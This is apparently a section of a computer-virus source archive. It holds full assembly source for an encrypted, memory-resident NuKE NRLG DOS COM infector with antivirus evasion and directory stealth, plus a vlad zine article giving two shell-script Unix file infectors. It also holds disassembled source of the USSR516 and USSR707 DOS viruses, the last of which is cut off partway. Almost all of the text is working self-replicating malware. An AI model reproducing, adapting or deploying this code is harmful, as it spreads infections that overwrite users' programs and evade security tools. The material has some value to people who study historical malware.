;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿsub byte ptr [di],087h
inc word ptr [di]
xor byte ptr [di],022h
inc word ptr [di]
xor byte ptr [di],030h
add byte ptr [di],075h
xor byte ptr [di],061h
sub byte ptr [di],0b9h
xor word ptr [di],0e185h
add word ptr [di],0aa17h
not word ptr [di]
inc byte ptr [di]
inc word ptr [di]
xor word ptr [di],0c3d7h
sub word ptr [di],04a83h
not byte ptr [di]
xor word ptr [di],06acdh
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿcall ANTI_V
;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;
xor word ptr [di],06acdh
not byte ptr [di]
add word ptr [di],04a83h
xor word ptr [di],0c3d7h
dec word ptr [di]
dec byte ptr [di]
not word ptr [di]
sub word ptr [di],0aa17h
xor word ptr [di],0e185h
add byte ptr [di],0b9h
xor byte ptr [di],061h
sub byte ptr [di],075h
xor byte ptr [di],030h
dec word ptr [di]
xor byte ptr [di],022h
dec word ptr [di]
add byte ptr [di],087h
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;---------------------------------
action: ;
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
mov cx,50 ;50 beep's!
beep: ;beep label!
mov ax,0E07h ;
int 10h ;print beep char
loop beep ;go!
NO_DAY: ;
ret ;
;---------------------------------
ÿ;---------------------------------
ANTI_V: ;
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
MOV DX,5945H ;
INT 21H ;
ret ;
;---------------------------------
ÿ;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push es
mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
sbb es:[bx+1fh],ax
not_infected:pop es
pop bx
pop ax
no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************
action_dia Db 01fH ;day for the action
action_mes Db 0cH ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start

63
MSDOS/Virus.MSDOS.Unknown.unix.txt Normal file
View File

@ -0,0 +1,63 @@
Lame Unix Viruses
+---------------+
Well, you might have read the title to this article and thought, well
if the damn thing is lame.. why the fuck is it in vlad#4 ?! This can
be answered quite simply, we had one free space! :) It was a bit of
a dilemma to begin with, we had four articles and one space. The problem
was they were all kinda lame. So it was a lame pick of the month episode.
Out of the four articles this was the leastest lamest. Well actually
I don't know about that, but anyway it was the most different one we
had sitting there. Just to prove the title, the author of these
masterpieces asked to remain anonymous to save his reputation.
These "viruses" are the equivalent of a DOS batch file infector because
they are written in shell language. They function similarly to companion
infectors by renaming the original file and replacing it with themselves.
Disinfection is simple by 'mv'ing (moving) the original files back.
Anyway, perhaps someone is interested so here they are. There isn't
much use for them except to annoy your friends when it messes up all
the files in their directory.
+-----------------------------------+
#!/bin/sh
# Dumb Unix Virus
# I dont wanna write anutha dumb unix virus qark, i wont
# Due to excess lameness, dont distribute
# <Author's name withheld for obvious reasons>
for files in *
do
if [ -x files ]
then
if [ ! -d files ]
then
mv files files.EVILVIRUS.HELPME
cp $0 files
chmod +x files
files.EVILVIRUS.HELPME
fi
fi
+-----------------------------------+
cat << _EOF >unix.virus
#!/bin/csh
# Dumber Unix Virus
# by
# SumUtherGuy
foreach i (*)
mv $i bak.$i
cp $0 $i
i >> $i
end
_EOF
+-----------------------------------+

278
MSDOS/Virus.MSDOS.Unknown.ussr516.asm Normal file
View File

@ -0,0 +1,278 @@
ussr516 segment byte public
assume cs:ussr516, ds:ussr516
org 100h
; Disassembled by Dark Angel of PHALCON/SKISM
; for 40Hex Number 7 Volume 2 Issue 3
stub: db 0e9h, 0, 0
db 0e9h, 1, 0, 0
; This is where the virus really begins
start:
push ax
call beginvir
orig4 db 0cdh, 20h, 0, 0
int30store db 0, 0, 0, 0 ; Actually it's int 21h
; entry point
int21store db 0, 0, 0, 0
beginvir: pop bp ; BP -> orig4
mov si,bp
mov di,103h
add di,[di-2] ; DI -> orig4
movsw ; restore original
movsw ; 4 bytes of program
xor si,si
mov ds,si
les di,dword ptr ds:[21h*4]
mov [bp+8],di ; int21store
mov [bp+0Ah],es
lds di,dword ptr ds:[30h*4+1] ; Bug????
findmarker:
inc di
cmp word ptr [di-2],0E18Ah ; Find marker bytes
jne findmarker ; to the entry point
mov [bp+4],di ; and move to
mov [bp+6],ds ; int30store
mov ax,5252h ; Get list of lists
int 21h ; and also ID check
add bx,12h ; Already installed?
jz quitvir ; then exit
push bx
mov ah,30h ; Get DOS version
int 21h
pop bx ; bx = 12, ptr to 1st
; disk buffer
cmp al,3
je handlebuffer ; if DOS 3
ja handleDBHCH ; if > DOS 3
inc bx ; DOS 2.X, offset is 13
handlebuffer:
push ds
push bx
lds bx,dword ptr [bx] ; Get seg:off of buffer
inc si
pop di
pop es ; ES:DI->seg:off buff
mov ax,[bx] ; ptr to next buffer
cmp ax,0FFFFh ; least recently used?
jne handlebuffer ; if not, go find it
cmp si,3
jbe quitvir
stosw
stosw
jmp short movetobuffer
handleDBHCH: ; Disk Buffer Hash Chain Head array
lds si,dword ptr [bx] ; ptr to disk buffer
lodsw ; info
lodsw ; seg of disk buffer
; hash chain head array
inc ax ; second entry
mov ds,ax
xor bx,bx
mov si,bx
lodsw ; EMS page, -1 if not
; in EMS
xchg ax,di ; save in di
lodsw ; ptr to least recently
; used buffer
mov [di+2],ax ; change disk buffer
; backward offset to
; least recently used
xchg ax,di ; restore EMS page
mov [di],ax ; set to least recently
movetobuffer: ; used
mov di,bx
push ds
pop es ; ES:DI -> disk buffer
push cs
pop ds
mov cx,108h
lea si,[bp-4] ; Copy from start
rep movsw
mov ds,cx ; DS -> interrupt table
mov word ptr ds:[4*21h],0BCh ; New interrupt handler
mov word ptr ds:[4*21h+2],es ; at int21
quitvir:
push cs ; CS = DS = ES
pop es
push es
pop ds
pop ax
mov bx,ax
mov si, 100h ; set up stack for
push si ; the return to the
retn ; original program
int24:
mov al,3 ; Ignore all errors
iret
tickstore db 3 ; Why???
buffer db 3, 0, 9, 0
int21:
pushf
cli ; CP/M style call entry
call dword ptr cs:[int30store-start]
retn ; point of int 21h
int21DSDX: ; For int 21h calls
push ds ; with
lds dx,dword ptr [bp+2] ; DS:DX -> filename
call int21
pop ds
retn
cmp ax,4B00h ; Execute
je Execute
cmp ax,5252h ; ID check
je CheckID
cmp ah,30h ; DOS Version
je DosVersion
callorig21: ; Do other calls
jmp dword ptr cs:[int21store-start]
DosVersion: ; Why????? ; DOS Version
dec byte ptr cs:[tickstore-start]
jnz callorig21 ; Continue if not 0
push es
xor ax,ax
push ax
mov es,ax
mov al,es:[46Ch] ; 40h:6Ch = Timer ticks
; since midnight
and al,7 ; MOD 15
inc ax
inc ax
mov cs:[tickstore-start],al ; # 2-17
pop ax
pop es
iret
CheckID: ; ID Check
mov bx,0FFEEh ; FFEEh = -12h
iret
Execute: ; Execute
push ax ; Save registers
push cx
push es
push bx
push ds ; DS:DX -> filename
push dx ; save it on stack
push bp
mov bp,sp ; Set up stack frame
sub sp,0Ah ; Temporary variables
; [bp-A] = attributes
; [bp-8] = int 24 off
; [bp-6] = int 24 seg
; [bp-4] = file time
; [bp-2] = file date
sti
push cs
pop ds
mov ax,3301h ; Turn off ^C check
xor dl,dl ; (never turn it back
call int21 ; on. Bug???)
mov ax,3524h ; Get int 24h
call int21 ; (Critical error)
mov [bp-8],bx
mov [bp-6],es
mov dx,int24-start
mov ax,2524h ; Set to new one
call int21
mov ax,4300h ; Get attributes
call int21DSDX
jnc continue
doneinfect:
mov ax,2524h ; Restore crit error
lds dx,dword ptr [bp-8] ; handler
call int21
cli
mov sp,bp
pop bp
pop dx
pop ds
pop bx
pop es
pop cx
pop ax
jmp short callorig21 ; Call orig handler
continue:
mov [bp-0Ah],cx ; Save attributes
test cl,1 ; Check if r/o????
jz noclearattr
xor cx,cx
mov ax,4301h ; Clear attributes
call int21DSDX ; Filename in DS:DX
jc doneinfect ; Quit on error
noclearattr:
mov ax,3D02h ; Open read/write
call int21DSDX ; Filename in DS:DX
jc doneinfect ; Exit if error
mov bx,ax
mov ax,5700h ; Save time/date
call int21
mov [bp-4],cx
mov [bp-2],dx
mov dx,buffer-start
mov cx,4
mov ah,3Fh ; Read 4 bytes to
call int21 ; buffer
jc quitinf
cmp byte ptr ds:[buffer-start],0E9h; Must start with 0E9h
jne quitinf ; Otherwise, quit
mov dx,word ptr ds:[buffer+1-start]; dx = jmploc
dec dx
xor cx,cx
mov ax,4201h ; go there
call int21
mov ds:[buffer-start],ax ; new location offset
mov dx,orig4-start
mov cx,4
mov ah,3Fh ; Read 4 bytes there
call int21
mov dx,ds:[orig4-start]
cmp dl,0E9h ; 0E9h means we might
jne infect ; already be there
mov ax,ds:[orig4+2-start] ; continue checking
add al,dh ; to see if we really
sub al,ah ; are there.
jz quitinf
infect:
xor cx,cx
mov dx,cx
mov ax,4202h ; Go to EOF
call int21
mov ds:[buffer+2-start],ax ; save filesize
mov cx,204h
mov ah,40h ; Write virus
call int21
jc quitinf ; Exit if error
sub cx,ax
jnz quitinf
mov dx,ds:[buffer-start]
mov ax,ds:[buffer+2-start]
sub ax,dx
sub ax,3 ; AX->jmp offset
mov word ptr ds:[buffer+1-start],ax; Set up buffer
mov byte ptr ds:[buffer-start],0E9h; code the jmp
add al,ah
mov byte ptr ds:[buffer+3-start],al
mov ax,4200h ; Rewind to jmploc
call int21
mov dx, buffer-start
mov cx,4 ; Write in the jmp
mov ah,40h
call int21
quitinf:
mov cx,[bp-4]
mov dx,[bp-2]
mov ax,5701h ; Restore date/time
call int21
mov ah,3Eh ; Close file
call int21
mov cx,[bp-0Ah] ; Restore attributes
mov ax,4301h
call int21DSDX
jmp doneinfect ; Return
ussr516 ends
end stub

408
MSDOS/Virus.MSDOS.Unknown.ussr707.asm Normal file
View File

@ -0,0 +1,408 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ USSR707 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 9-Feb-92 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 20h
data_2e equ 22h
data_3e equ 4Ch
data_4e equ 4Eh
data_5e equ 84h
data_6e equ 86h
data_7e equ 413h
data_8e equ 1460h
data_9e equ 3
data_10e equ 2
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
ussr707 proc far
start:
mov ax,offset loc_2
push ax
retn
loc_2:
jmp short loc_3
nop
ussr707 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_2 proc near
call sub_3
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_3:
pop di
sub di,6
retn
sub_2 endp
db 60h, 14h, 2Bh, 02h, 2Eh, 3Ah
db 26h,0FFh, 0Dh, 00h,0A0h, 00h
db 50h,0C3h, 01h, 2Eh,0A3h,0C0h
db 00h, 9Ch, 00h, 00h, 90h, 90h
db 90h,0CDh
db 20h
loc_3:
call sub_2
mov ah,[di+21h]
mov byte ptr ds:[100h],ah
mov ax,[di+22h]
mov word ptr ds:[101h],ax
mov ax,[di+24h]
mov word ptr ds:[103h],ax
mov ah,30h ; '0'
int 21h ; DOS Services ah=function 30h
; get DOS version number ax
cmp ax,1E03h
je loc_4 ; Jump if equal
jmp loc_9
loc_4:
mov bl,0
mov ax,4BFFh
int 21h ; ??INT Non-standard interrupt
cmp bl,0FFh
jne loc_5 ; Jump if not equal
jmp loc_9
loc_5:
mov ax,ds:data_10e
mov [di+14h],ax
mov bx,di
add bx,0Fh
xor ax,ax ; Zero register
mov es,ax
loc_6:
xor si,si ; Zero register
mov ax,es
inc ax
cmp ax,0FFFh
jbe loc_7 ; Jump if below or =
jmp short loc_9
nop
loc_7:
mov es,ax
loc_8:
mov ah,es:data_8e[si]
cmp ah,[bx+si]
jne loc_6 ; Jump if not equal
inc si
cmp si,5
jne loc_8 ; Jump if not equal
mov [di+0Dh],es
mov word ptr [di+1Fh],0
mov ax,cs
dec ax
mov es,ax
call sub_7
sub si,di
mov ax,si
mov cl,4
shr ax,cl ; Shift w/zeros fill
inc ax
sub es:data_9e,ax
sub ds:data_10e,ax
mov bx,[di+14h]
sub bx,ax
mov es,bx
push di
call sub_4
xor cx,cx ; Zero register
mov ds,cx
mov cl,6
shr ax,cl ; Shift w/zeros fill
inc ax
sub ds:data_7e,ax
mov ax,ds:data_5e
mov cs:[bx+0Bh],ax
mov ax,ds:data_6e
mov cs:[bx+0Dh],ax
push cs
pop ds
mov cx,si
mov si,di
xor di,di ; Zero register
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop di
sub bx,di
add bx,2
xor ax,ax ; Zero register
mov ds,ax
cli ; Disable interrupts
mov ds:data_5e,bx
mov ds:data_6e,es
sti ; Enable interrupts
loc_9:
push cs
pop ds
push cs
pop es
mov ax,offset start
push ax
retn
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_4 proc near
call sub_5
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_5:
pop bx
retn
sub_4 endp
push bx
mov bh,4Bh ; 'K'
cmp bh,ah
je loc_11 ; Jump if equal
pop bx
loc_10:
;* jmp far ptr loc_1
db 0EAh, 93h, 17h, 26h, 0Dh
loc_11:
cmp al,0FFh
jne loc_12 ; Jump if not equal
pop bx
mov bl,0FFh
iret ; Interrupt return
pushf ; Push flags
;* call far ptr sub_1
db 9Ah, 00h, 00h, 00h, 00h
push ax
in al,61h ; port 61h, 8255 port B, read
xor al,3
out 61h,al ; port 61h, 8255 B - spkr, etc
mov al,0B6h
out 43h,al ; port 43h, 8253 wrt timr mode
mov ax,bx
out 42h,al ; port 42h, 8253 timer 2 spkr
mov al,ah
out 42h,al ; port 42h, 8253 timer 2 spkr
pop ax
iret ; Interrupt return
loc_12:
push ax
push cx
push dx
push di
push ds
push es
mov bx,dx
xor di,di ; Zero register
loc_13:
inc di
cmp byte ptr [bx+di],0
jne loc_13 ; Jump if not equal
cmp word ptr [bx+di-2],4D4Fh
je loc_14 ; Jump if equal
jmp loc_26
loc_14:
cmp byte ptr [bx+di-3],43h ; 'C'
je loc_15 ; Jump if equal
jmp loc_26
loc_15:
call sub_2
mov bx,di
add bx,1Ah
mov ax,70h
mov es,ax
xor di,di ; Zero register
loc_16:
inc di
cmp di,0FFFFh
jbe loc_17 ; Jump if below or =
jmp loc_26
loc_17:
xor si,si ; Zero register
loc_18:
mov ah,es:[di]
cmp ah,cs:[bx+si]
jne loc_16 ; Jump if not equal
inc si
inc di
cmp si,5
jne loc_18 ; Jump if not equal
sub di,5
xor ax,ax ; Zero register
mov es,ax
push word ptr es:data_3e
push word ptr es:data_4e
cli ; Disable interrupts
mov es:data_3e,di
mov word ptr es:data_4e,70h
sti ; Enable interrupts
call sub_2
mov bx,dx
xor cx,cx ; Zero register
mov ah,4Eh ; 'N'
call sub_6
jnc loc_19 ; Jump if carry=0
jmp loc_25
loc_19:
mov ah,2Fh ; '/'
call sub_6
mov ax,es:[bx+1Ah]
cmp ax,0F000h
jbe loc_20 ; Jump if below or =
jmp loc_25
loc_20:
push ds
push dx
push word ptr es:[bx+15h]
push word ptr es:[bx+16h]
push word ptr es:[bx+18h]
add ax,100h
mov cs:[di+18h],ax
mov ax,4301h
mov cx,20h
call sub_6
mov ax,3D02h
call sub_6
jnc loc_21 ; Jump if carry=0
jmp short loc_24
nop
loc_21:
push cs
pop ds
mov bx,ax
mov ah,3Fh ; '?'
mov cx,5
mov dx,di
add dx,21h
call sub_6
mov ax,[di+18h]
sub ax,[di+22h]
cmp ax,2C3h
jne loc_23 ; Jump if not equal
cmp byte ptr [di+20h],1Eh
jae loc_22 ; Jump if above or =
inc byte ptr [di+20h]
loc_22:
jmp short loc_24
nop
loc_23:
mov byte ptr [di+17h],0B8h
mov ax,4200h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_6
mov ah,40h ; '@'
mov cx,3
mov dx,di
add dx,17h
call sub_6
mov ah,40h ; '@'
mov cx,2
mov word ptr [di+17h],0C350h
call sub_6
mov ax,4202h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_6
mov ah,40h ; '@'
call sub_7
mov cx,si
sub cx,di
mov dx,di
call sub_6
loc_24:
mov ax,5701h
pop dx
pop cx
call sub_6
mov ax,4301h
pop cx
mov ch,0
pop dx
pop ds
call sub_6
mov ah,3Eh ; '>'
call sub_6
loc_25:
xor ax,ax ; Zero register
mov es,ax
cli ; Disable interrupts
pop word ptr es:data_4e
pop word ptr es:data_3e
sti ; Enable interrupts
loc_26:
call sub_2
cmp byte ptr cs:[di+1Fh],0
jne loc_27 ; Jump if not equal
cmp byte ptr cs:[di+20h],1Eh
jb loc_27 ; Jump if below
mov byte ptr cs:[di+1Fh],1
xor ax,ax ; Zero register
mov es,ax
call sub_4
add bx,17h
mov ax,es:data_1e
mov cx,es:data_2e
mov cs:[bx+2],ax
mov cs:[bx+4],cx
cli ; Disable interrupts
mov es:data_1e,bx
mov es:data_2e,cs
sti ; Enable interrupts
loc_27:
pop es
pop ds
pop di
pop dx
pop cx
pop ax
pop bx
jmp loc_10
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_6 proc near
pushf ; Push flags
call dword ptr cs:[di+0Bh]
retn
sub_6 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
